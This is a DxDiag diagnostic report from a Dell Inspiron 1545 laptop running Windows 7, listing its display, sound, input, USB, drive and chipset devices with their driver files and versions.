DxDiag output: ------------------ System Information ------------------ Time of this report: 7/22/2012, 20:32:16 Machine name: ~-PC Operating System: Windows 7 Professional 32-bit (6.1, Build 7601) Service Pack 1 (7601.win7sp1_gdr.120330-1504) Language: English (Regional Setting: English) System Manufacturer: Dell Inc. System Model: Inspiron 1545 BIOS: Phoenix ROM BIOS PLUS Version 1.10 A07 Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz (2 CPUs), ~2.0GHz Memory: 3072MB RAM Available OS Memory: 3034MB RAM Page File: 2120MB used, 3946MB available Windows Dir: C:\Windows DirectX Version: DirectX 11 DX Setup Parameters: Not found User DPI Setting: Using System DPI System DPI Setting: 96 DPI (100 percent) DWM DPI Scaling: Disabled DxDiag Version: 6.01.7601.17514 32bit Unicode
------------ DxDiag Notes ------------ Display Tab 1: No problems found. Sound Tab 1: No problems found. Input Tab: No problems found.
-------------------- DirectX Debug Levels -------------------- Direct3D: 0/4 (retail) DirectDraw: 0/4 (retail) DirectInput: 0/5 (retail) DirectMusic: 0/5 (retail) DirectPlay: 0/9 (retail) DirectSound: 0/5 (retail) DirectShow: 0/6 (retail)
--------------- Display Devices --------------- Card name: Mobile Intel(R) 4 Series Express Chipset Family Manufacturer: Intel Corporation Chip type: Mobile Intel(R) 4 Series Express Chipset Family DAC type: Internal Device Key: Enum\PCI\VEN_8086&DEV_2A42&SUBSYS_02AA1028&REV_07 Display Memory: 1325 MB Dedicated Memory: 64 MB Shared Memory: 1261 MB Current Mode: 1366 x 768 (32 bit) (60Hz) Monitor Name: Generic PnP Monitor Monitor Model: unknown Monitor Id: SEC5441 Native Mode: 1366 x 768(p) (59.998Hz) Output Type: Internal Driver Name: igdumdx32.dll,igd10umd32.dll Driver File Version: 8.15.0010.2302 (English) Driver Version: 8.15.10.2302 DDI Version: 10 Driver Model: WDDM 1.1 Driver Attributes: Final Retail Driver Date/Size: 2/11/2011 19:09:48, 571904 bytes WHQL Logo'd: Yes WHQL Date Stamp: Device Identifier: {D7B78E66-6902-11CF-667B-A022A7C2C535} Vendor ID: 0x8086 Device ID: 0x2A42 SubSys ID: 0x02AA1028 Revision ID: 0x0007 Driver Strong Name: oem23.inf:Intel.Mfg:iCNT0:8.15.10.2302:pci\ven_8086&dev_2a42 Rank Of Driver: 00E62001 Video Accel: ModeMPEG2_A ModeMPEG2_C ModeWMV9_B ModeWMV9_C ModeVC1_B ModeVC1_C Deinterlace Caps: {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering {335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering {335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering {335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering {335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering {335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering {335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering {335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering {335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch {5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend D3D9 Overlay: Supported DXVA-HD: Supported DDraw Status: Enabled D3D Status: Enabled AGP Status: Enabled
------------- Sound Devices ------------- Description: Speakers (High Definition Audio Device) Default Sound Playback: Yes Default Voice Playback: Yes Hardware ID: HDAUDIO\FUNC_01&VEN_111D&DEV_76B2&SUBSYS_102802AA&REV_1003 Manufacturer ID: 1 Product ID: 65535 Type: WDM Driver Name: HdAudio.sys Driver Version: 6.01.7601.17514 (English) Driver Attributes: Final Retail WHQL Logo'd: Yes Date and Size: 11/20/2010 06:00:21, 304128 bytes Other Files: Driver Provider: Microsoft HW Accel Level: Basic Cap Flags: 0xF1F Min/Max Sample Rate: 100, 200000 Static/Strm HW Mix Bufs: 1, 0 Static/Strm HW 3D Bufs: 0, 0 HW Memory: 0 Voice Management: No EAX(tm) 2.0 Listen/Src: No, No I3DL2(tm) Listen/Src: No, No Sensaura(tm) ZoomFX(tm): No
--------------------- Sound Capture Devices --------------------- Description: Microphone (High Definition Audio Device) Default Sound Capture: Yes Default Voice Capture: Yes Driver Name: HdAudio.sys Driver Version: 6.01.7601.17514 (English) Driver Attributes: Final Retail Date and Size: 11/20/2010 06:00:21, 304128 bytes Cap Flags: 0x1 Format Flags: 0xFFFFF
------------------- DirectInput Devices ------------------- Device Name: Mouse Attached: 1 Controller ID: n/a Vendor/Product ID: n/a FF Driver: n/a
Device Name: Keyboard Attached: 1 Controller ID: n/a Vendor/Product ID: n/a FF Driver: n/a
Device Name: Microsoft Hardware USB Mouse Attached: 1 Controller ID: 0x0 Vendor/Product ID: 0x045E, 0x0745 FF Driver: n/a
Device Name: Micr Attached: 1 Controller ID: 0x0 Vendor/Product ID: 0x045E, 0x0745 FF Driver: n/a
Device Name: Micr Attached: 1 Controller ID: 0x0 Vendor/Product ID: 0x045E, 0x0745 FF Driver: n/a
Device Name: Micr Attached: 1 Controller ID: 0x0 Vendor/Product ID: 0x045E, 0x0745 FF Driver: n/a
Device Name: Micr Attached: 1 Controller ID: 0x0 Vendor/Product ID: 0x045E, 0x0745 FF Driver: n/a
Poll w/ Interrupt: No
----------- USB Devices ----------- + USB Root Hub | Vendor/Product ID: 0x8086, 0x2936 | Matching Device ID: usb\root_hub | Service: usbhub | Driver: usbhub.sys, 3/24/2011 22:58:37, 258560 bytes | Driver: usbd.sys, 3/24/2011 22:57:53, 5888 bytes
---------------- Gameport Devices ----------------
------------ PS/2 Devices ------------ + Standard PS/2 Keyboard | Matching Device ID: *pnp0303 | Service: i8042prt | Driver: i8042prt.sys, 7/13/2009 19:11:24, 80896 bytes | Driver: kbdclass.sys, 7/13/2009 21:20:36, 42576 bytes | + HID Keyboard Device | Vendor/Product ID: 0x045E, 0x0745 | Matching Device ID: hid_device_system_keyboard | Service: kbdhid | Driver: kbdhid.sys, 11/20/2010 05:50:10, 28160 bytes | Driver: kbdclass.sys, 7/13/2009 21:20:36, 42576 bytes | + Terminal Server Keyboard Driver | Matching Device ID: root\rdp_kbd | Upper Filters: kbdclass | Service: TermDD | Driver: i8042prt.sys, 7/13/2009 19:11:24, 80896 bytes | Driver: kbdclass.sys, 7/13/2009 21:20:36, 42576 bytes | + PS/2 Compatible Mouse | Matching Device ID: *pnp0f13 | Service: i8042prt | Driver: i8042prt.sys, 7/13/2009 19:11:24, 80896 bytes | Driver: mouclass.sys, 7/13/2009 21:20:44, 41552 bytes | + Microsoft USB Dual Receiver Wireless Mouse (IntelliPoint) | Vendor/Product ID: 0x045E, 0x0745 | Matching Device ID: hid\vid_045e&pid_0745&mi_01&col01 | Upper Filters: Point32 | Service: mouhid | Driver: point32.sys, 8/1/2011 15:56:42, 40936 bytes | Driver: mouhid.sys, 7/13/2009 19:45:08, 26112 bytes | Driver: mouclass.sys, 7/13/2009 21:20:44, 41552 bytes | Driver: wdfcoinstaller01009.dll, 7/7/2010 18:18:56, 1461992 bytes | + HID-compliant mouse | Vendor/Product ID: 0x413C, 0x3016 | Matching Device ID: hid_device_system_mouse | Service: mouhid | Driver: mouhid.sys, 7/13/2009 19:45:08, 26112 bytes | Driver: mouclass.sys, 7/13/2009 21:20:44, 41552 bytes | + Terminal Server Mouse Driver | Matching Device ID: root\rdp_mou | Upper Filters: mouclass | Service: TermDD | Driver: termdd.sys, 11/20/2010 08:30:12, 53120 bytes | Driver: sermouse.sys, 7/13/2009 19:45:08, 19968 bytes | Driver: mouclass.sys, 7/13/2009 21:20:44, 41552 bytes
------------------------ Disk & DVD/CD-ROM Drives ------------------------ Drive: C: Free Space: 35.9 GB Total Space: 137.6 GB File System: NTFS Model: ST9160310AS
Drive: E: Free Space: 0.0 GB Total Space: 15.0 GB File System: NTFS Model: ST9160310AS
Drive: G: Model: Kingston DTVault Privacy USB Device Driver: c:\windows\system32\drivers\cdrom.sys, 6.01.7601.17514 (English), 11/20/2010 04:38:10, 108544 bytes
Drive: D: Model: Optiarc DVD+-RW AD-7580S Driver: c:\windows\system32\drivers\cdrom.sys, 6.01.7601.17514 (English), 11/20/2010 04:38:10, 108544 bytes
-------------- System Devices -------------- Name: Intel(R) ICH9 Family PCI Express Root Port 1 - 2940 Device ID: PCI\VEN_8086&DEV_2940&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E0 Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes
Name: Intel(R) ICH9 Family USB Universal Host Controller - 2935 Device ID: PCI\VEN_8086&DEV_2935&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E9 Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes
Name: High Definition Audio Controller Device ID: PCI\VEN_8086&DEV_293E&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D8 Driver: C:\Windows\system32\DRIVERS\hdaudbus.sys, 6.01.7601.17514 (English), 11/20/2010 05:59:29, 108544 bytes
Name: Intel(R) ICH9 Family USB Universal Host Controller - 2934 Device ID: PCI\VEN_8086&DEV_2934&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E8 Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes
Name: Mobile Intel(R) 4 Series Express Chipset Family Device ID: PCI\VEN_8086&DEV_2A43&SUBSYS_02AA1028&REV_07\3&18D45AA6&0&11 Driver: n/a
Name: Intel(R) ICH9 Family USB2 Enhanced Host Controller - 293C Device ID: PCI\VEN_8086&DEV_293C&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D7 Driver: C:\Windows\system32\drivers\usbehci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:58, 43008 bytes Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes
Name: Intel(R) ICH9 Family SMBus Controller - 2930 Device ID: PCI\VEN_8086&DEV_2930&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&FB Driver: n/a
Name: Mobile Intel(R) 4 Series Express Chipset Family Device ID: PCI\VEN_8086&DEV_2A42&SUBSYS_02AA1028&REV_07\3&18D45AA6&0&10 Driver: C:\Windows\system32\DRIVERS\igdkmd32.sys, 8.15.0010.2302 (English), 2/11/2011 19:12:16, 9036800 bytes Driver: C:\Windows\system32\igdumd32.dll, 8.15.0010.2302 (English), 2/11/2011 19:12:16, 4967424 bytes Driver: C:\Windows\system32\igkrng500.bin, 4/21/2010 18:08:14, 982240 bytes Driver: C:\Windows\system32\igcompkrng500.bin, 4/21/2010 18:08:14, 439308 bytes Driver: C:\Windows\system32\igfcg500m.bin, 4/21/2010 18:08:14, 92356 bytes Driver: C:\Windows\system32\iglhxs32.vp, 2/11/2011 19:42:52, 51636 bytes Driver: C:\Windows\system32\iglhxo32.vp, 4/21/2010 17:22:50, 60015 bytes Driver: C:\Windows\system32\iglhxc32.vp, 4/21/2010 17:22:50, 60226 bytes Driver: C:\Windows\system32\iglhxg32.vp, 4/21/2010 17:22:52, 60254 bytes Driver: C:\Windows\system32\iglhxa32.vp, 4/21/2010 17:22:50, 1090 bytes Driver: C:\Windows\system32\iglhxa32.cpa, 4/21/2010 17:22:50, 1921265 bytes Driver: C:\Windows\system32\iglhcp32.dll, 1.05.0002.0001 (English), 2/11/2011 18:35:00, 147456 bytes Driver: C:\Windows\system32\iglhsip32.dll, 1.05.0002.0001 (English), 2/11/2011 18:35:00, 208896 bytes Driver: C:\Windows\system32\hccutils.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:48, 95232 bytes Driver: C:\Windows\system32\igfxsrvc.dll, 8.15.0010.2302 (English), 2/11/2011 18:41:12, 57856 bytes Driver: C:\Windows\system32\igfxsrvc.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:30, 267800 bytes Driver: C:\Windows\system32\igfxpph.dll, 8.15.0010.2302 (English), 2/11/2011 18:41:30, 195584 bytes Driver: C:\Windows\system32\igfxcpl.cpl, 8.15.0010.2302 (English), 2/11/2011 18:41:30, 115200 bytes Driver: C:\Windows\system32\igfxdev.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:38, 228864 bytes Driver: C:\Windows\system32\igfxdo.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:56, 130048 bytes Driver: C:\Windows\system32\igfxtray.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:32, 137752 bytes Driver: C:\Windows\system32\hkcmd.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:26, 171032 bytes Driver: C:\Windows\system32\igfxress.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:38, 828928 bytes Driver: C:\Windows\system32\igfxpers.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:30, 172568 bytes Driver: C:\Windows\system32\igfxTMM.dll, 8.15.0010.2302 (English), 2/11/2011 18:41:30, 261632 bytes Driver: C:\Windows\system32\TVWSetup.exe, 1.00.0001.0000 (English), 2/11/2011 19:26:38, 8198680 bytes Driver: C:\Windows\system32\gfxSrvc.dll, 8.15.0010.2302 (English), 2/11/2011 18:40:42, 120320 bytes Driver: C:\Windows\system32\GfxUI.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:22, 3157528 bytes Driver: C:\Windows\system32\GfxUI.exe.config, 4/21/2010 17:29:46, 151 bytes Driver: C:\Windows\system32\IGFXDEVLib.dll, 1.00.0000.0000 (Invariant Language), 2/11/2011 18:40:40, 4096 bytes Driver: C:\Windows\system32\igfxext.exe, 8.15.0010.2302 (English), 2/11/2011 19:26:28, 179224 bytes Driver: C:\Windows\system32\igfxexps.dll, 8.15.0010.2302 (English), 2/11/2011 18:41:28, 23552 bytes Driver: C:\Windows\system32\igfxrara.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:00, 84480 bytes Driver: C:\Windows\system32\igfxrchs.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:00, 81920 bytes Driver: C:\Windows\system32\igfxrcht.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:00, 81920 bytes Driver: C:\Windows\system32\igfxrdan.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 84992 bytes Driver: C:\Windows\system32\igfxrdeu.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 86016 bytes Driver: C:\Windows\system32\igfxrenu.lrc, 8.15.0010.2302 (English), 2/11/2011 18:40:38, 85504 bytes Driver: C:\Windows\system32\igfxresn.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:08, 86528 bytes Driver: C:\Windows\system32\igfxrfin.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 85504 bytes Driver: C:\Windows\system32\igfxrfra.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 86528 bytes Driver: C:\Windows\system32\igfxrheb.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 84480 bytes Driver: C:\Windows\system32\igfxrita.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 86016 bytes Driver: C:\Windows\system32\igfxrjpn.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 82944 bytes Driver: C:\Windows\system32\igfxrkor.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:06, 82944 bytes Driver: C:\Windows\system32\igfxrnld.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:02, 86016 bytes Driver: C:\Windows\system32\igfxrnor.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:06, 85504 bytes Driver: C:\Windows\system32\igfxrplk.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:06, 86016 bytes Driver: C:\Windows\system32\igfxrptb.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:06, 85504 bytes Driver: C:\Windows\system32\igfxrptg.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:08, 86016 bytes Driver: C:\Windows\system32\igfxrrus.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:08, 86016 bytes Driver: C:\Windows\system32\igfxrsky.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:10, 86016 bytes Driver: C:\Windows\system32\igfxrslv.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:10, 85504 bytes Driver: C:\Windows\system32\igfxrsve.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:08, 85504 bytes Driver: C:\Windows\system32\igfxrtha.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:10, 84992 bytes Driver: C:\Windows\system32\igfxrcsy.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:00, 85504 bytes Driver: C:\Windows\system32\igfxrell.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 86528 bytes Driver: C:\Windows\system32\igfxrhun.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:04, 85504 bytes Driver: C:\Windows\system32\igfxrtrk.lrc, 8.15.0010.2302 (English), 2/11/2011 18:44:10, 85504 bytes Driver: C:\Windows\system32\Gfxres.ar-SA.resources, 2/11/2011 18:44:12, 139851 bytes Driver: C:\Windows\system32\Gfxres.cs-CZ.resources, 2/11/2011 18:44:14, 118687 bytes Driver: C:\Windows\system32\Gfxres.da-DK.resources, 2/11/2011 18:44:14, 114203 bytes Driver: C:\Windows\system32\Gfxres.de-DE.resources, 2/11/2011 18:44:16, 122651 bytes Driver: C:\Windows\system32\Gfxres.el-GR.resources, 2/11/2011 18:44:16, 178349 bytes Driver: C:\Windows\system32\Gfxres.es-ES.resources, 2/11/2011 18:44:18, 122869 bytes Driver: C:\Windows\system32\Gfxres.en-US.resources, 8/25/2010 20:02:24, 110156 bytes Driver: C:\Windows\system32\Gfxres.fi-FI.resources, 2/11/2011 18:44:20, 118639 bytes Driver: C:\Windows\system32\Gfxres.fr-FR.resources, 2/11/2011 18:44:20, 120742 bytes Driver: C:\Windows\system32\Gfxres.he-IL.resources, 2/11/2011 18:44:22, 133688 bytes Driver: C:\Windows\system32\Gfxres.hu-HU.resources, 2/11/2011 18:44:22, 119558 bytes Driver: C:\Windows\system32\Gfxres.it-IT.resources, 2/11/2011 18:44:24, 125500 bytes Driver: C:\Windows\system32\Gfxres.ja-JP.resources, 2/11/2011 18:44:24, 136343 bytes Driver: C:\Windows\system32\Gfxres.ko-KR.resources, 2/11/2011 18:44:26, 123172 bytes Driver: C:\Windows\system32\Gfxres.nb-NO.resources, 2/11/2011 18:44:28, 114794 bytes Driver: C:\Windows\system32\Gfxres.nl-NL.resources, 2/11/2011 18:44:28, 119528 bytes Driver: C:\Windows\system32\Gfxres.pl-PL.resources, 2/11/2011 18:44:30, 118351 bytes Driver: C:\Windows\system32\Gfxres.pt-BR.resources, 2/11/2011 18:44:30, 120308 bytes Driver: C:\Windows\system32\Gfxres.pt-PT.resources, 2/11/2011 18:44:32, 119009 bytes Driver: C:\Windows\system32\Gfxres.ru-RU.resources, 2/11/2011 18:44:32, 165337 bytes Driver: C:\Windows\system32\Gfxres.sk-SK.resources, 2/11/2011 18:44:34, 118000 bytes Driver: C:\Windows\system32\Gfxres.sl-SI.resources, 2/11/2011 18:44:36, 114314 bytes Driver: C:\Windows\system32\Gfxres.sv-SE.resources, 2/11/2011 18:44:36, 119302 bytes Driver: C:\Windows\system32\Gfxres.th-TH.resources, 2/11/2011 18:44:38, 189494 bytes Driver: C:\Windows\system32\Gfxres.tr-TR.resources, 2/11/2011 18:44:38, 121115 bytes Driver: C:\Windows\system32\Gfxres.zh-CN.resources, 2/11/2011 18:44:40, 102825 bytes Driver: C:\Windows\system32\Gfxres.zh-TW.resources, 2/11/2011 18:44:40, 103986 bytes Driver: C:\Windows\system32\ig4icd32.dll, 8.15.0010.2302 (English), 2/11/2011 18:51:10, 11039744 bytes Driver: C:\Windows\system32\igd10umd32.dll, 8.15.0010.2302 (English), 2/11/2011 19:04:40, 4411392 bytes Driver: C:\Windows\system32\d3dx10_40.dll, 9.24.0950.2656 (English), 8/13/2009 22:09:44, 452440 bytes Driver: C:\Windows\system32\igdumdx32.dll, 8.15.0010.2302 (English), 2/11/2011 19:09:48, 571904 bytes Driver: C:\Windows\system32\igfxCoIn_v2302.dll, 1.02.0030.0000 (English), 2/11/2011 19:20:00, 81920 bytes
Name: Intel(R) ICH9 Family USB2 Enhanced Host Controller - 293A Device ID: PCI\VEN_8086&DEV_293A&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&EF Driver: C:\Windows\system32\drivers\usbehci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:58, 43008 bytes Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes
Name: Intel(R) ICH9M-E/M SATA AHCI Controller Device ID: PCI\VEN_8086&DEV_2929&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&FA Driver: C:\Windows\system32\DRIVERS\iaStor.sys, 10.05.0000.1029 (English), 6/15/2011 09:00:28, 461080 bytes Driver: C:\Windows\system32\RSTCoin.dll, 1.03.0001.0000 (English), 6/15/2011 09:20:52, 105240 bytes Driver: C:\Windows\RST_UI.cab, , 0 bytes
Name: Mobile Intel(R) 4 Series Chipset Processor to DRAM Controller - 2A40 Device ID: PCI\VEN_8086&DEV_2A40&SUBSYS_02AA1028&REV_07\3&18D45AA6&0&00 Driver: n/a
Name: Intel(R) ICH9 Family USB Universal Host Controller - 2939 Device ID: PCI\VEN_8086&DEV_2939&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D2 Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes
Name: Intel(R) ICH9M LPC Interface Controller - 2919 Device ID: PCI\VEN_8086&DEV_2919&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&F8 Driver: C:\Windows\system32\DRIVERS\msisadrv.sys, 6.01.7600.16385 (English), 7/13/2009 21:20:43, 13888 bytes
Name: Intel(R) ICH9 Family PCI Express Root Port 5 - 2948 Device ID: PCI\VEN_8086&DEV_2948&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E4 Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes
